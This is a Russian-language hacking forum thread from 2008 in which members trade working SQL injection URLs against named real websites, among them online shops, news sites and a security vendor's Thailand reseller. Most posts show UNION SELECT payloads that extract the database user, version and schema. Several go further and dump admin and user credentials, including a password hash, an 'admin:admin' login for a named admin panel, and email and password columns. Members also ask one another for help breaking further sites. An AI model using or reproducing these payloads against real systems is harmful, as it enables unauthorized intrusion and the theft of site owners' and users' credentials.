HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.05.2008, 15:14
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами: 9740547

Репутация: 93
По умолчанию

Мелочевка.

hadouken!
Цитата:
http://www.hadouken.co.uk/category.php?categoryID=-1+union+select+1,2,concat(user(),0x2,database(),0x 2,version()),4,5,6,7--
user: uk_hadoukenUser@unity-apache2
db: uk_hadouken
version: 4.0.14-Max-log

panelmonkey.org
Цитата:
http://www.panelmonkey.org/background.php?id=-7+union+select+1,concat(user(),0x2,database(),0x3, version()),3,4,5,6,7--
user: dbo113074304@74.208.16.39
db: db113074304
version: 4.0.27-max-log

bitdefenderthailand.com
Цитата:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,unhex(hex(concat(user(),0x2,da tabase(),0x2,version()))),4,5,6,7,8,9,10--
user: amphonet_priy@localhost
db: amphonet_bitdefender
version: 5.0.22

Код:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(TABLE_NAME,0x2,COLUMN_NAME))),6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+where+COLUMN_NAME+like+'login'--
Код:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id,0x2,company_name,0x2,address,0x2,company_phone,0x2,contact_person,0x2,password))),6,7,8,9,10+from+dealer--
 
Ответить с цитированием

  #2  
Старый 03.05.2008, 17:30
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

Веломаг

Код:
http://veliki.ru/shop/show_cat.php?grid=-10%20union%20select%201,2,3,version(),5,6/*
Код:
http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,passwd),5,6/**/from/**/user/*

Код:
http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,password),5,6/**/from/**/admin/*
ну а вот и админ

Цитата:
veliki:5d0c553853953d3b
 
Ответить с цитированием

  #3  
Старый 04.05.2008, 01:22
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
С нами: 9655526

Репутация: 1334
По умолчанию

Цитата:
http://www.cedarcityreview.com/articles.php?id=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10,11,12,13,14/*
VERSION: 5.1.22-rc
USER: cedarv_user@localhost
DATABASE: cedarv_omnibus
 
Ответить с цитированием

  #4  
Старый 04.05.2008, 18:26
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами: 9640431

Репутация: 105
По умолчанию

2 Nekt
Боян, ниче там не фильтруется и не жесть никакая, читай мануалы
http://www.gregorypacks.com/prod.php?ID=-1+union+select+1,2,3,concat_ws(0x3C62723E,DATABASE (),VERSION(),USER()),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52+--+
 
Ответить с цитированием

  #5  
Старый 04.05.2008, 21:54
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Что скажете насчет этого -
http://sexnos.ru/registration.php

В форме ввода пароля, если ввести "> то выдает ошибку что то с датой связонное с запросом..

пробовал запросы состовлять -но ничего путного не вышло... Можно как то расковырять?
 
Ответить с цитированием

  #6  
Старый 04.05.2008, 22:05
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
С нами: 9742875

Репутация: 81
По умолчанию

http://www.suncity.kiev.ua/index.php?id=90+and+lower(substring(version(),1,1) )=4&lang=en

Слепая четвертой версии, кто хотит раскручивайте)))
==============================================

http://www.balaklawa.com/static.php?code=-1+union+select+1,version(),3--&lng=en

5 версия, лажа, ничего интересного в таблицах
 
Ответить с цитированием

  #7  
Старый 05.05.2008, 08:00
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

magic-shop.ru
первый магазин фокусов и иллюзии
1 фокус показываю я Ж)
http://www.magic-shop.ru/?action=product_view&id=-1'+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER( ),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42/*
4.1.20-1.gms:w_magics@195.42.160.22:w_magics
Ничё подобрать не получилось но лучше так чем никак, мб там префикс т.к. новости на сайте есть а таблы news нету, ну мб она называется nowosty Ж)
 
Ответить с цитированием

  #8  
Старый 05.05.2008, 15:04
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами: 10214321

Репутация: 552
По умолчанию

Код:
http://www.handshake.in/browse.videos.php?category=-1+union+all+select+1,2,3,concat(admin_username,char(58),admin_password),5,6,7,8+from+joovili_admins/*
и админка
http://www.handshake.in/admin/login.php
admin:admin

Код:
http://www.hostreward.com/directory.php?ax=list&sub=7&cat_id=-1+union+all+select+1,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,null,null,7,8,9,10,11,12,13,14+from+links--

Последний раз редактировалось SWAT; 05.05.2008 в 15:13..
 
Ответить с цитированием

  #9  
Старый 05.05.2008, 17:38
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

www.mt8.ru
Код:
http://www.mt8.ru/index.php?action=product_view&id=0x3127%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
4.0.25-log:medtehni@dux.hc.ru:wwwmedtehnika8ru


www.bestwine.ru
Код:
http://www.bestwine.ru/index.php?action=product_view&id=0x36383327%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
5.0.45-log:u93285@10.10.153.168:u93285


www.alcotrade.ru
Код:
http://www.alcotrade.ru/index.php?action=product_view&id=0x342733383638%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
4.1.22-standard-log:interdes_alcotra@localhost:interdes_alcotrade
 
Ответить с цитированием

  #10  
Старый 05.05.2008, 19:32
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

www.autovista.ru
Код:
http://www.autovista.ru/spy/publish.php?id=-111+UNION+SELECT+email,password,3,4+from+shop/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...